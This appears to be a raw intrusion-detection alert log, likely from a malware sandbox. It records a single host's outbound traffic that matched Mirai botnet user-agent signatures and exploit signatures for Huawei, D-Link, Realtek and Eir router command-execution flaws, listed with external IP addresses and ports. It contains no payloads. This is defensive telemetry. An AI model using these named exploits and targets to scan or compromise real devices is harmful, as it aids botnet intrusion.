                            192.168.2.2346.41.136.6246606802846457 10/23/22-17:58:15.376062TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4660680192.168.2.2346.41.136.62
                            192.168.2.2370.113.78.685271875472835222 10/23/22-17:58:32.174734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)527187547192.168.2.2370.113.78.68
                            192.168.2.2389.42.3.13753896802846457 10/23/22-17:57:43.768106TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5389680192.168.2.2389.42.3.137
                            192.168.2.2382.153.163.1450456802846380 10/23/22-17:57:46.325359TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5045680192.168.2.2382.153.163.14
                            192.168.2.23171.22.122.18454146802846457 10/23/22-17:58:05.418255TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5414680192.168.2.23171.22.122.184
                            192.168.2.2395.101.250.18839978802027121 10/23/22-17:58:30.353286TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3997880192.168.2.2395.101.250.188
                            192.168.2.2337.46.128.2343696802846457 10/23/22-17:57:07.142795TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4369680192.168.2.2337.46.128.23
                            192.168.2.2354.191.47.17559730802835221 10/23/22-17:57:16.701947TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5973080192.168.2.2354.191.47.175
                            192.168.2.2388.99.120.1539654802027121 10/23/22-17:57:47.238003TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3965480192.168.2.2388.99.120.15
                            192.168.2.23164.92.217.19851764802846457 10/23/22-17:57:22.271354TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5176480192.168.2.23164.92.217.198
                            192.168.2.23197.166.232.18859668802841623 10/23/22-17:57:31.340270TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5966880192.168.2.23197.166.232.188
                            192.168.2.2380.15.175.23437408802846380 10/23/22-17:58:33.165130TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3740880192.168.2.2380.15.175.234
                            192.168.2.23181.63.252.4955986802846380 10/23/22-17:57:25.717989TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5598680192.168.2.23181.63.252.49
                            192.168.2.23122.169.123.19839822802846457 10/23/22-17:58:19.981464TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3982280192.168.2.23122.169.123.198
                            192.168.2.2368.189.6.13160716802841623 10/23/22-17:57:20.274209TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6071680192.168.2.2368.189.6.131
                            192.168.2.2385.187.9.17560492802846457 10/23/22-17:58:37.521293TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6049280192.168.2.2385.187.9.175
                            192.168.2.2395.154.54.23552386802027121 10/23/22-17:58:24.024329TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5238680192.168.2.2395.154.54.235
                            192.168.2.23178.248.200.11833196802846380 10/23/22-17:57:27.971033TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3319680192.168.2.23178.248.200.118
                            192.168.2.2380.65.132.1451578802846457 10/23/22-17:56:52.713648TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5157880192.168.2.2380.65.132.14
                            192.168.2.2379.118.143.15746958802841623 10/23/22-17:57:07.465546TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4695880192.168.2.2379.118.143.157
                            192.168.2.23115.4.50.1094105875472023548 10/23/22-17:58:11.553647TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE410587547192.168.2.23115.4.50.109
                            192.168.2.2395.64.163.14635030802027121 10/23/22-17:58:39.775240TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3503080192.168.2.2395.64.163.146
                            192.168.2.2361.81.33.17657902802846457 10/23/22-17:57:50.873042TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5790280192.168.2.2361.81.33.176
                            192.168.2.23112.157.27.21756278802027121 10/23/22-17:56:58.625319TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5627880192.168.2.23112.157.27.217
                            192.168.2.2388.221.45.13449558802027121 10/23/22-17:57:54.686419TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4955880192.168.2.2388.221.45.134
                            192.168.2.23171.246.92.15653954802846457 10/23/22-17:57:59.896744TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5395480192.168.2.23171.246.92.156
                            192.168.2.2337.9.170.2358306802846457 10/23/22-17:58:30.779303TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5830680192.168.2.2337.9.170.23
                            192.168.2.2359.15.77.14043758802841623 10/23/22-17:57:46.952347TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4375880192.168.2.2359.15.77.140
                            192.168.2.2395.160.28.4750608802027121 10/23/22-17:57:49.332978TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5060880192.168.2.2395.160.28.47
                            192.168.2.23112.78.145.2044074802027121 10/23/22-17:57:52.074257TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4407480192.168.2.23112.78.145.20
                            192.168.2.23178.18.254.24256138802846380 10/23/22-17:58:13.484636TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5613880192.168.2.23178.18.254.242
                            192.168.2.2395.101.17.19140598802027121 10/23/22-17:58:15.238586TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4059880192.168.2.2395.101.17.191
                            192.168.2.2388.49.133.2656320802027121 10/23/22-17:57:49.411882TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5632080192.168.2.2388.49.133.26
                            192.168.2.2388.198.103.3737196802027121 10/23/22-17:57:59.936405TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3719680192.168.2.2388.198.103.37
                            192.168.2.23195.248.230.16747200802846457 10/23/22-17:58:10.247905TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4720080192.168.2.23195.248.230.167
                            192.168.2.23178.238.111.2444668802846380 10/23/22-17:56:55.329778TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4466880192.168.2.23178.238.111.24
                            192.168.2.23200.14.249.4941990802846380 10/23/22-17:57:30.763337TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4199080192.168.2.23200.14.249.49
                            192.168.2.23178.168.169.6834968802846380 10/23/22-17:57:49.441257TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3496880192.168.2.23178.168.169.68
                            192.168.2.23178.128.118.15559414802846380 10/23/22-17:58:13.284338TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5941480192.168.2.23178.128.118.155
                            192.168.2.23169.63.9.1952010802846380 10/23/22-17:57:51.921388TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5201080192.168.2.23169.63.9.19
                            192.168.2.23178.5.195.19849048802846380 10/23/22-17:58:27.265332TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4904880192.168.2.23178.5.195.198
                            192.168.2.2395.179.138.11441822802027121 10/23/22-17:58:39.654913TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4182280192.168.2.2395.179.138.114
                            192.168.2.23112.213.104.16254618802027121 10/23/22-17:56:58.145092TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5461880192.168.2.23112.213.104.162
                            192.168.2.2346.17.90.20938618802846457 10/23/22-17:58:23.982381TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3861880192.168.2.2346.17.90.209
                            192.168.2.2380.133.216.19254796802846457 10/23/22-17:57:09.746379TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5479680192.168.2.2380.133.216.192
                            192.168.2.23200.69.83.2546712802846380 10/23/22-17:57:10.777301TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4671280192.168.2.23200.69.83.25
                            192.168.2.232.18.131.2739184802846457 10/23/22-17:57:28.760820TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3918480192.168.2.232.18.131.27
                            192.168.2.232.23.233.12834330802846457 10/23/22-17:57:50.460824TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3433080192.168.2.232.23.233.128
                            192.168.2.2389.216.56.11039588802846457 10/23/22-17:58:32.885864TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3958880192.168.2.2389.216.56.110
                            192.168.2.23206.210.193.12045094802846380 10/23/22-17:56:42.730580TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4509480192.168.2.23206.210.193.120
                            192.168.2.23164.46.51.4450958802846457 10/23/22-17:57:22.519455TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5095880192.168.2.23164.46.51.44
                            192.168.2.23206.53.53.12558760802846380 10/23/22-17:57:18.550207TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5876080192.168.2.23206.53.53.125
                            192.168.2.23206.132.162.9647928802846380 10/23/22-17:57:29.591792TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4792880192.168.2.23206.132.162.96
                            192.168.2.23213.176.77.16648620802846380 10/23/22-17:57:48.649938TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4862080192.168.2.23213.176.77.166
                            192.168.2.23213.179.157.11535814802846380 10/23/22-17:56:49.742825TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3581480192.168.2.23213.179.157.115
                            192.168.2.23195.245.94.248014802846457 10/23/22-17:56:59.497510TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4801480192.168.2.23195.245.94.2
                            192.168.2.2395.211.124.23238618802027121 10/23/22-17:58:12.704449TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3861880192.168.2.2395.211.124.232
                            192.168.2.23181.179.9.2658978802846380 10/23/22-17:57:11.050832TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5897880192.168.2.23181.179.9.26
                            192.168.2.2354.246.138.24149212802841623 10/23/22-17:57:01.124424TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4921280192.168.2.2354.246.138.241
                            192.168.2.2395.9.192.9736082802027121 10/23/22-17:57:18.779936TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3608280192.168.2.2395.9.192.97
                            192.168.2.2373.81.42.10756262802835221 10/23/22-17:57:07.567330TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5626280192.168.2.2373.81.42.107
                            192.168.2.235.62.37.24154114528692027339 10/23/22-17:57:35.315658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5411452869192.168.2.235.62.37.241
                            192.168.2.2346.163.116.11733516802846457 10/23/22-17:58:05.437481TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3351680192.168.2.2346.163.116.117
                            192.168.2.23195.77.90.7136918802846457 10/23/22-17:58:10.259964TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3691880192.168.2.23195.77.90.71
                            192.168.2.2380.35.114.10035590802846380 10/23/22-17:58:39.170650TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3559080192.168.2.2380.35.114.100
                            192.168.2.2395.57.247.18557314802027121 10/23/22-17:58:30.485137TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5731480192.168.2.2395.57.247.185
                            192.168.2.23188.128.215.24939722802846457 10/23/22-17:58:20.013954TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3972280192.168.2.23188.128.215.249
                            192.168.2.2385.17.71.17257648802846457 10/23/22-17:58:26.388542TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5764880192.168.2.2385.17.71.172
                            192.168.2.23181.16.81.25056470802846380 10/23/22-17:58:01.159339TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5647080192.168.2.23181.16.81.250
                            192.168.2.23178.253.43.841114802846380 10/23/22-17:56:49.749313TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4111480192.168.2.23178.253.43.8
                            192.168.2.2395.104.78.16755758802027121 10/23/22-17:57:16.207806TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5575880192.168.2.2395.104.78.167
                            192.168.2.23112.125.24.1042126802027121 10/23/22-17:56:41.451147TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4212680192.168.2.23112.125.24.10
                            192.168.2.23112.126.102.936552802027121 10/23/22-17:57:13.597701TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3655280192.168.2.23112.126.102.9
                            192.168.2.2389.41.36.6638442802846457 10/23/22-17:57:55.937842TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3844280192.168.2.2389.41.36.66
                            192.168.2.23156.229.211.22939640802841623 10/23/22-17:57:28.747625TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3964080192.168.2.23156.229.211.229
                            192.168.2.2395.21.51.1237278802027121 10/23/22-17:57:54.640088TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3727880192.168.2.2395.21.51.12
                            192.168.2.232.22.209.12749412802846457 10/23/22-17:57:28.764796TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4941280192.168.2.232.22.209.127
                            192.168.2.2389.34.101.12544730528692027339 10/23/22-17:58:32.637804TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4473052869192.168.2.2389.34.101.125
                            192.168.2.2395.216.190.3735464802027121 10/23/22-17:57:40.690837TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3546480192.168.2.2395.216.190.37
                            192.168.2.2376.189.158.124318475472835222 10/23/22-17:56:43.260935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)431847547192.168.2.2376.189.158.12
                            192.168.2.2388.214.236.15950970802027121 10/23/22-17:58:09.669602TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5097080192.168.2.2388.214.236.159
                            192.168.2.23156.254.33.21347714372152835222 10/23/22-17:57:33.283503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4771437215192.168.2.23156.254.33.213
                            192.168.2.2380.97.209.15542736802846457 10/23/22-17:56:52.724553TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4273680192.168.2.2380.97.209.155
                            192.168.2.2395.110.132.22442506802027121 10/23/22-17:58:17.323566TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4250680192.168.2.2395.110.132.224
                            192.168.2.235.129.79.15141336802846457 10/23/22-17:57:02.981519TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4133680192.168.2.235.129.79.151
                            192.168.2.23213.122.235.22055728802846380 10/23/22-17:57:37.879771TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5572880192.168.2.23213.122.235.220
                            192.168.2.2395.47.161.5443576802027121 10/23/22-17:57:40.726655TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4357680192.168.2.2395.47.161.54
                            192.168.2.2395.110.146.15549046802027121 10/23/22-17:57:13.006374TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4904680192.168.2.2395.110.146.155
                            192.168.2.2386.120.46.3241330802846380 10/23/22-17:57:46.317663TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4133080192.168.2.2386.120.46.32
                            192.168.2.2361.223.228.1947372802846457 10/23/22-17:57:02.974325TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4737280192.168.2.2361.223.228.19
                            192.168.2.2388.221.123.4240218802027121 10/23/22-17:57:05.124614TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4021880192.168.2.2388.221.123.42
                            192.168.2.2372.175.60.255497075472023548 10/23/22-17:58:01.495700TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE549707547192.168.2.2372.175.60.25
                            192.168.2.2395.86.81.23039304802027121 10/23/22-17:57:40.754801TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3930480192.168.2.2395.86.81.230
                            192.168.2.2395.195.113.21636696802027121 10/23/22-17:58:36.715213TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3669680192.168.2.2395.195.113.216
                            192.168.2.2395.86.86.12932892802027121 10/23/22-17:57:21.071511TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3289280192.168.2.2395.86.86.129
                            192.168.2.2388.221.190.755442802027121 10/23/22-17:58:35.001203TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5544280192.168.2.2388.221.190.7
                            192.168.2.2384.19.173.16452130802841623 10/23/22-17:58:35.828320TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5213080192.168.2.2384.19.173.164
                            192.168.2.2361.157.227.3253898802846457 10/23/22-17:57:51.829174TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5389880192.168.2.2361.157.227.32
                            192.168.2.2385.175.227.11533898802846457 10/23/22-17:57:58.585196TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3389880192.168.2.2385.175.227.115
                            192.168.2.23112.185.198.7835882802027121 10/23/22-17:57:16.120365TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3588280192.168.2.23112.185.198.78
                            192.168.2.2395.68.60.3144362802027121 10/23/22-17:57:33.458947TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4436280192.168.2.2395.68.60.31
                            192.168.2.23156.93.225.1635137080802841623 10/23/22-17:57:35.398558TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)513708080192.168.2.23156.93.225.163
                            192.168.2.2388.110.80.7851942802027121 10/23/22-17:58:05.258423TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5194280192.168.2.2388.110.80.78
                            192.168.2.2395.101.60.17445282802027121 10/23/22-17:57:25.949040TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4528280192.168.2.2395.101.60.174
                            192.168.2.235.226.55.11847426802846457 10/23/22-17:57:35.571414TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4742680192.168.2.235.226.55.118
                            192.168.2.2386.63.13.745496802841623 10/23/22-17:58:07.360550TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4549680192.168.2.2386.63.13.7
                            192.168.2.2343.201.77.22151390802835222 10/23/22-17:57:40.767021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139080192.168.2.2343.201.77.221
                            192.168.2.235.149.76.19236388802846457 10/23/22-17:57:53.339207TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3638880192.168.2.235.149.76.192
                            192.168.2.2389.144.28.11238098802846457 10/23/22-17:57:07.073238TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3809880192.168.2.2389.144.28.112
                            192.168.2.2374.43.220.2147056802841623 10/23/22-17:58:29.395457TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4705680192.168.2.2374.43.220.21
                            192.168.2.2388.116.21.10252816802027121 10/23/22-17:58:02.095305TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5281680192.168.2.2388.116.21.102
                            192.168.2.2395.213.249.17045378802027121 10/23/22-17:58:12.741202TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4537880192.168.2.2395.213.249.170
                            192.168.2.2395.67.7.5337986802027121 10/23/22-17:56:46.636448TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3798680192.168.2.2395.67.7.53
                            192.168.2.235.105.57.20258076802846457 10/23/22-17:57:08.378861TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5807680192.168.2.235.105.57.202
                            192.168.2.2385.128.243.4659808802846457 10/23/22-17:58:17.750753TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5980880192.168.2.2385.128.243.46
                            192.168.2.2385.214.109.3938846802846457 10/23/22-17:57:41.196003TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3884680192.168.2.2385.214.109.39
                            192.168.2.2334.76.74.10445154802841623 10/23/22-17:56:47.921557TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4515480192.168.2.2334.76.74.104
                            192.168.2.2385.13.150.20337756802846457 10/23/22-17:57:00.159868TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3775680192.168.2.2385.13.150.203
                            192.168.2.23206.225.84.859490802846380 10/23/22-17:56:42.702800TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5949080192.168.2.23206.225.84.8
                            192.168.2.2388.208.9.19442766802027121 10/23/22-17:58:05.157441TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4276680192.168.2.2388.208.9.194
                            192.168.2.232.21.197.24232876802846457 10/23/22-17:57:28.770787TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3287680192.168.2.232.21.197.242
                            192.168.2.2349.12.56.7033412802835221 10/23/22-17:57:28.381541TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)3341280192.168.2.2349.12.56.70
                            192.168.2.2378.47.192.10360316802846457 10/23/22-17:58:04.228008TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6031680192.168.2.2378.47.192.103
                            192.168.2.2385.215.90.12850370802846457 10/23/22-17:58:26.393408TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5037080192.168.2.2385.215.90.128
                            192.168.2.23156.248.215.11237904802841623 10/23/22-17:58:28.035223TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3790480192.168.2.23156.248.215.112
                            192.168.2.23112.46.0.652104802027121 10/23/22-17:58:25.786507TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5210480192.168.2.23112.46.0.6
                            192.168.2.23122.237.29.8151688528692027339 10/23/22-17:58:36.308014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5168852869192.168.2.23122.237.29.81
                            192.168.2.2395.110.147.13855308802027121 10/23/22-17:57:23.576634TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5530880192.168.2.2395.110.147.138
                            192.168.2.235.196.166.9839950802846457 10/23/22-17:57:46.216184TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3995080192.168.2.235.196.166.98
                            192.168.2.23181.29.230.6855272802846380 10/23/22-17:58:01.160846TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5527280192.168.2.23181.29.230.68
                            192.168.2.2385.24.191.22143600802846457 10/23/22-17:57:00.293101TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4360080192.168.2.2385.24.191.221
                            192.168.2.2352.51.101.18956142802835221 10/23/22-17:57:11.020124TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5614280192.168.2.2352.51.101.189
                            192.168.2.2361.252.173.7559392802846457 10/23/22-17:57:31.817606TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5939280192.168.2.2361.252.173.75
                            192.168.2.2389.185.250.9650978802846457 10/23/22-17:57:55.919282TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5097880192.168.2.2389.185.250.96
                            192.168.2.23200.0.201.16533330802846380 10/23/22-17:57:57.993380TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3333080192.168.2.23200.0.201.165
                            192.168.2.2334.144.235.1436336802835222 10/23/22-17:56:43.281124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3633680192.168.2.2334.144.235.14
                            192.168.2.23112.49.20.14056360802027121 10/23/22-17:58:29.890240TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5636080192.168.2.23112.49.20.140
                            192.168.2.23181.215.47.19352410802846380 10/23/22-17:57:10.928117TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5241080192.168.2.23181.215.47.193
                            192.168.2.235.190.33.12651294802846457 10/23/22-17:57:53.509841TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5129480192.168.2.235.190.33.126
                            192.168.2.2388.249.64.20659430802027121 10/23/22-17:58:36.349679TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5943080192.168.2.2388.249.64.206
                            192.168.2.23200.42.93.8837380802846380 10/23/22-17:57:14.205877TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3738080192.168.2.23200.42.93.88
                            192.168.2.2395.68.143.18545160802027121 10/23/22-17:58:12.838810TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4516080192.168.2.2395.68.143.185
                            192.168.2.2318.203.114.12335412802835221 10/23/22-17:56:48.003722TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)3541280192.168.2.2318.203.114.123
                            192.168.2.2378.129.191.7156902802835222 10/23/22-17:57:58.552595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5690280192.168.2.2378.129.191.71
                            192.168.2.2388.148.91.8754784802027121 10/23/22-17:57:05.159450TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5478480192.168.2.2388.148.91.87
                            192.168.2.2388.99.40.6736714802027121 10/23/22-17:58:32.657829TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3671480192.168.2.2388.99.40.67
                            192.168.2.23112.80.248.4648880802027121 10/23/22-17:57:10.269344TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4888080192.168.2.23112.80.248.46
                            192.168.2.2385.214.72.4557656802846457 10/23/22-17:57:31.240282TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5765680192.168.2.2385.214.72.45
                            192.168.2.2346.163.117.16440232802846457 10/23/22-17:57:53.176295TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4023280192.168.2.2346.163.117.164
                            192.168.2.2395.217.4.15642304802027121 10/23/22-17:57:21.038752TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4230480192.168.2.2395.217.4.156
                            192.168.2.2395.100.232.2737994802027121 10/23/22-17:56:46.623464TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3799480192.168.2.2395.100.232.27
                            192.168.2.2337.77.74.2554974528692027339 10/23/22-17:58:30.506992TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497452869192.168.2.2337.77.74.25
                            192.168.2.23112.49.47.853804802027121 10/23/22-17:56:46.390283TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5380480192.168.2.23112.49.47.8
                            192.168.2.23213.87.80.2645896802846380 10/23/22-17:57:48.883208TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4589680192.168.2.23213.87.80.26
                            192.168.2.2380.12.80.8534194802846380 10/23/22-17:56:39.207837TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3419480192.168.2.2380.12.80.85
                            192.168.2.2380.154.29.24744908802846457 10/23/22-17:57:14.328185TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4490880192.168.2.2380.154.29.247
                            192.168.2.2389.163.217.23755750802846457 10/23/22-17:58:10.277439TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5575080192.168.2.2389.163.217.237
                            192.168.2.23169.1.233.9038006802846380 10/23/22-17:58:09.345906TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3800680192.168.2.23169.1.233.90
                            192.168.2.2382.81.57.11838752802846380 10/23/22-17:56:39.359447TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3875280192.168.2.2382.81.57.118
                            192.168.2.23112.34.112.10836420802027121 10/23/22-17:57:10.301508TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3642080192.168.2.23112.34.112.108
                            192.168.2.23164.155.111.4843136802846457 10/23/22-17:57:22.533590TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4313680192.168.2.23164.155.111.48
